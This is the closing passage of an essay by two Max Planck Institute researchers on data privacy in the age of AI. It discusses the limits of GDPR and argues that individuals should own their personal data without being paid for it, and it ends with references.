In line with this way of thinking, the European Union’s new General Data Protection Regulation (GDPR), which became effective in May 2018, states that companies are permitted to collect and store only the minimum amount of user data needed to provide a specific, stated service, and must get customers’ consent for how their data will be used. Such a restriction on data capture may also prevent second-order inferences. One important limitation of the GDPR approach is that companies can give themselves very broad objectives. The now-shut-down Cambridge Analytica’s explicit objective, for example, was to assess your personality, so technically its controversial collection of Facebook data satisfied GDPR’s guidelines. Similarly, GDPR’s focus on the alignment between data and a given service does not exclude categories of data we find morally questionable, nor completely stop companies from buying excluded data from a data broker as long as the user has consented—and many people consent to sharing their data even with relatively meager incentives. Researchers found that some MIT students would share their friends’ contact data for a slice of pizza [5]. Clearly, further restrictions are needed. But how many?

The American activist and programmer Richard Stallman gave this answer: “There are so many ways to use data to hurt people that the only safe database is the one that was never collected.” But restricting data collection too severely may impede progress and undermine the benefits we stand to gain from AI.

Who should decide on these tradeoffs? We should all do it ourselves.

In most cases we are actually talking about data that is owned by you and me. We have been careless in giving it away for shiny apps without considering the consequences. In fact, we’ve been giving our data away for so long that we’ve forgotten it’s ours in the first place. Taking it back allows us to individually decide whether there is something we want or don’t want to know. Restoring data to its rightful owners—us—neatly solves many of the hard challenges we’ve discussed. It avoids the need to develop universal, prescient guidelines about data. Instead, millions of individuals will guide their own data usage according to their sense of what is right and wrong. We can all react in real time to evolving uses of data by companies, punishing or rewarding companies according to how their data is treated.

The computer science philosopher Jaron Lanier has suggested an additional, economic argument for placing data back into the hands of people. We should all be able to profit from our private data, he reasons, by selling it to big companies. The problem with this approach is twofold. First, it muddles the ethics of data use and ownership. The willingness to give data away for free is a good litmus test for the ethical integrity of the questions that data will be used to answer. How many individuals from a minority group would freely give away their data in order to create a facial recognition app like the gaydar? And how many would agree to be paid to do so? On the other hand, a majority of the population would gladly contribute their data to finding a cure for cancer. Second, putting (high) economic value on personal data may coerce people to share their data and make data privacy a privilege of the rich.

This isn’t to say that individual action alone will be sufficient. Collective action by society’s institutions will also be required. Even if only a small portion of the population shares their sensitive data, the result may be a predictive model of high accuracy that the majority never consented to. Not all of us are aware of this. To prevent unwanted consequences we would need additional laws and public debates.

The Economist has written that the world’s most valuable resource is no longer oil—it’s data. But data is very different from oil. Data is an unlimited resource, it’s owned by individuals, and it’s best exchanged without any transactional economic value. Taking the profit out of oil kills the oil market. As a first step, taking profit out of data provides the space we need to create and maintain ethical standards that can survive the coming of AI, and pave the way for managing collective ignorance. In other words, as data becomes one of the most useful commodities of the modern world, it also needs to become one of the cheapest.

Christina Leuker is a pre-doctoral fellow at the Max Planck Institute for Human Development.

Wouter van den Bos is a research scientist at the Max Planck Institute for Human Development.

References

1. Wang, Y. & Kosinski, M. Deep neural networks are more accurate than humans at detecting sexual orientation from facial images. Journal of Personality and Social Psychology 114, 246-257 (2018).

2. Dressel, J. & Farid, H. The accuracy, fairness, and limits of predicting recidivism. Science Advances 4, eaao5580 (2018).

3. Hertwig, R. & Engel, C. Homo ignorans: Deliberately choosing not to know. Perspectives on Psychological Science 11, 359-372 (2016).

4. Gigerenzer, G. & Garcia-Retamero, R. Cassandra’s regret: The psychology of not wanting to know. Psychological Review 124, 179-196 (2017).

5. Athey, S., Catalini, C., & Tucker, C.E. The digital privacy paradox: Small money, small costs, small talk. Stanford University Graduate School of Business Research Paper No. 17-14 (2018).

Additional Reading

Stallman, R. A radical proposal to keep your personal data safe. The Guardian (2018).

Staff writers. The world’s most valuable resource is no longer oil, but data. The Economist (2017).

Lead photo collage credit: Oliver Burston / Getty Images; Pixabay
